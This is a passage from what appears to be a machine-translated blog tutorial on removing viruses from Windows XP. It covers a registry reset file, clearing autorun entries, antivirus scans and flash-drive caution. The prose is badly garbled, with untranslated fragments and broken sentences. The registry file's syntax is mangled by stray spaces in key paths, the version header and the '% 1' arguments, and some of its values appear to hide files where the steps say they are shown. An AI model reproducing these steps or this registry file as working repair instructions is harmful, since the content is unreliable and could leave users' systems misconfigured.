2. How to Eliminate Computer Viruses: After turning off the virus successfully do the default return value parameter system that is used to activate the virus themselves and remove themselves to block the effort. These parameters are on the windows registry which can be reset to the default value. Save the following files with the name of any file with the extention. Reg. Then execute the file by clicking 2 times. If you can confirm there is a Yes / Ok. Following registry file is:
Windows Registry Editor Version 5:00
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced]
"Hidden" = dword: 00000000
"SuperHidden" = dword: 00000000
"ShowSuperHidden" = dword: 00000000
[HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Control \ SafeBoot]
"AlternateShell" = "Cmd.exe"
[HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet002 \ Control \ SafeBoot]
"AlternateShell" = "Cmd.exe"
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot]
"AlternateShell" = "Cmd.exe"
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]
"Shell" = "Explorer.exe"
"Userinit" = "C: \ WINDOWS \ system32 \ userinit.exe,"
[HKEY_CLASSES_ROOT \ regfile \ shell \ open \ command]
@ = "Regedit.exe \"% 1 \ ""
[HKEY_CLASSES_ROOT \ scrfile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ piffile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ comfile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ exefile \ shell \ open \ command]
@ = "\"% 1 \ "% *"
Above registry file akan unblock regedit, grafting prevent the virus itself on the system, and reset the parameters to prevent the virus the way again.
3. How to Eliminate Computer Viruses: After the virus is turned off and reset the system parameters. Prevent the virus active again by removing the autorun virus entry and startup of Windows. Tool can use the default windows msconfig or edit directly in the registry with regedit. To more easily use third party tools like autoruns from http://www.sysinternals.com entry to delete autorun virus, and the startup property page. Do not forget to check the Startup folder on the Start Menu -> Programs -> Startup and make sure there is no virus entry page.
4. How to Eliminate Computer Viruses: Download the latest antivirus and do full system scanning on the antivirus that checks the entire system and remove all viruses found. I recommend avira that can be downloaded from the http://www.free-av.com are free virus scanner and the same ttough with commercial anti-virus such as Kaspersky or Symantec.
5. How to Eliminate Computer Viruses: Before restarting make sure you do not pass the virus from either autorun or proces and system start up. Because if not then restart when the system will return as at the time of virus infection and useless all the steps you did before.
6. How to Eliminate Computer Viruses: After restarting your computer and check back and see whether the symptoms that appear when the computer is still infected or not. If you have some miss autorun virus or reset the system parameters above does not work. Do the above and more careful check of each step before you restart the system.
That is the step-step removal of the virus on the system Windows XP. To prevent the virus comes back you should be diligent to update or install anti-virus applications such as prevention WinPooch or Comodo Firewall will warn the user when there are other programs that will modify the system. So even though the virus is not known but before entering the user of warned prevention by the application. When you identify the programs that access the system you want then you can allow access, but if the decline and should not block access, it is because there is a possibility that program is a virus.
Be careful when opening the flash disk. Do not open the flash disk with a click 2 times. Go with the right click menu and select Open in order to autoplay feature on the flash disk does not run a virus Automatic Do not forget to note the files that you open. Although icon same note that the file that you open or open type of application.Rata Penuhprogram. Make sure the file is a word exactly the word and folders exactly the folder can see the detail with the properties of the file or page. Hopefully this article helped you and prevent computer virus infection.
Subscribe to RSS Feed Follow me on Twitter!